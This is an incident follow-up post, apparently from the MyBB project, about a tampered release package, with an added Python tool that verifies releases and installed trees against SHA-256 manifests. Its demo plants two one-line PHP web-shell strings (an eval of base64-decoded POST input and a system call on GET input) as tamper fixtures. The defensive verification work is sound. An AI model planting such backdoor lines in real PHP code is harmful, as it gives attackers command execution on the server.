A little over two weeks ago we announced the discovery of a rather significant vulnerability which may have affected some users. At the time there was a lot of uncertainty about the circumstances, but it is time to follow up on our original announcement with what has since come to hand. I hope this answers any outstanding questions and eases some of the concern; most importantly, I hope everyone checks their installations to make sure they are not vulnerable.
First and foremost, I can confirm that the code was malicious and that the release package was modified on the server by a third party. It is therefore crucial that you follow the instructions in the previous blog post to ensure your installation is not vulnerable. The release package was cleaned as soon as the alarm was raised, so if you downloaded MyBB after the first blog post you do not need to worry. We are not sure exactly when the release packages were tampered with, so if you downloaded your package shortly after the release you may not have been affected either, but the only way to be sure is to check.
Unfortunately there was a vulnerability in the CMS which powers the MyBB home page and download system. Using it, an attacker was able to add a backdoor to one of the CMS files, allowing them to execute arbitrary PHP on the server and manipulate the release packages. The CMS was custom written a number of years ago, but we believe a third-party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB, so there is no reason to believe these events indicate a vulnerability in MyBB itself. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.
In light of these events, we are looking at making several changes. At the very least we intend to publish checksums alongside downloads so that a contaminated release can be identified; we are also looking into automating the verification process using a remote server. Using a CDN to distribute our packages is another option being considered.
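The checksum workflow described above, as an added example that is not MyBB's code and not what the project later shipped: the publisher side writes a sha256sum-style manifest ("digest, two spaces, relative path") for a release; the verifier side checks a downloaded package against its published digest, and audits an installed tree against the manifest so that a modified file or a planted extra file stands out. The manifest format, the file names, their contents and the backdoor strings are all constructed placeholders for the example.

```python
import hashlib
import hmac
import os
import shutil
import tempfile
from typing import Dict, Iterable, List, Tuple

HEX = set("0123456789abcdef")


def sha256_file(path: str, chunk: int = 1 << 16) -> str:
    """Stream a file through SHA-256 and return the lowercase hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: str) -> str:
    """Publisher side: sha256sum(1)-style lines for every file under root, sorted
    so that two builds of the same tree produce byte-identical manifests."""
    lines = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            lines.append(f"{sha256_file(full)}  {os.path.relpath(full, root).replace(os.sep, '/')}")
    return "\n".join(sorted(lines)) + "\n"


def parse_manifest(text: str) -> Dict[str, str]:
    """Verifier side: {relative path: digest}. Blank lines and '#' comments are skipped;
    any other malformed line is an error, because a truncated or mangled manifest that
    parses "successfully" would silently stop covering files."""
    entries: Dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64 or not set(parts[0].lower()) <= HEX:
            raise ValueError(f"manifest line {lineno}: malformed entry")
        entries[parts[1].lstrip("*").strip()] = parts[0].lower()  # '*' is sha256sum's binary-mode marker
    return entries


def verify_download(path: str, expected_hex: str) -> bool:
    """Check one downloaded package against the digest published for it."""
    return hmac.compare_digest(sha256_file(path), expected_hex.strip().lower())


def verify_tree(root: str, manifest: Dict[str, str],
                ignore: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Audit an installed tree against the release manifest. 'modified' and 'unexpected'
    are where a planted backdoor shows up; 'ignore' lists paths the site legitimately
    changes (config, uploads) so they do not drown the report."""
    skip = set(ignore)
    report: Dict[str, List[str]] = {"ok": [], "modified": [], "missing": [], "unexpected": []}
    seen = set()
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel in skip:
                continue
            seen.add(rel)
            if rel not in manifest:
                report["unexpected"].append(rel)
            elif hmac.compare_digest(sha256_file(full), manifest[rel]):
                report["ok"].append(rel)
            else:
                report["modified"].append(rel)
    report["missing"] = sorted(set(manifest) - seen - skip)
    for bucket in report.values():
        bucket.sort()
    return report


def demo_download() -> Tuple[bool, bool]:
    """Constructed: one package checked against its real digest and against a wrong one."""
    fd, path = tempfile.mkstemp(suffix=".zip")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(b"PK\x03\x04 constructed package bytes, not a real archive\n")
        return verify_download(path, sha256_file(path).upper()), verify_download(path, "0" * 64)
    finally:
        os.remove(path)


def demo_tree() -> Dict[str, List[str]]:
    """Constructed: hash a clean release, then tamper with an installed copy the way the
    incident describes (shipped file modified, backdoor file added) and audit it."""
    root = tempfile.mkdtemp(prefix="release_verify_")
    try:
        os.makedirs(os.path.join(root, "inc"))
        clean = {"index.php": b"<?php require 'inc/init.php';\n",
                 "inc/init.php": b"<?php define('IN_APP', 1);\n",
                 "inc/config.php": b"<?php $config = array();\n"}
        for rel, body in clean.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(body)
        manifest = parse_manifest(build_manifest(root))  # what would be published with the release
        with open(os.path.join(root, "inc", "init.php"), "ab") as f:
            f.write(b"eval(base64_decode($_POST['c']));\n")  # backdoor appended to a shipped file
        with open(os.path.join(root, "inc", "shell.php"), "wb") as f:
            f.write(b"<?php system($_GET['cmd']);\n")  # new file that is not part of the release
        os.remove(os.path.join(root, "index.php"))  # a shipped file gone missing
        with open(os.path.join(root, "inc", "config.php"), "ab") as f:
            f.write(b"// site-specific edit\n")  # legitimate local change, ignored below
        return verify_tree(root, manifest, ignore={"inc/config.php"})
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

`demo_tree()` reports `inc/init.php` as modified, `inc/shell.php` as unexpected and `index.php` as missing; the manifest it builds is in the format `sha256sum -c manifest.txt` already understands, so the command-line check needs no custom tooling. One caveat worth keeping in mind with this scheme: a digest served from the same host as the package can be replaced by whoever replaced the package, which is exactly what happened here. The digests only add assurance when they are fetched from a host the download server cannot write to, or when the manifest is signed with a key kept off the web server.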
MyBB 1.6.5 should be released in the next few weeks; until then, please be sure to follow the instructions in the first blog post to secure your board.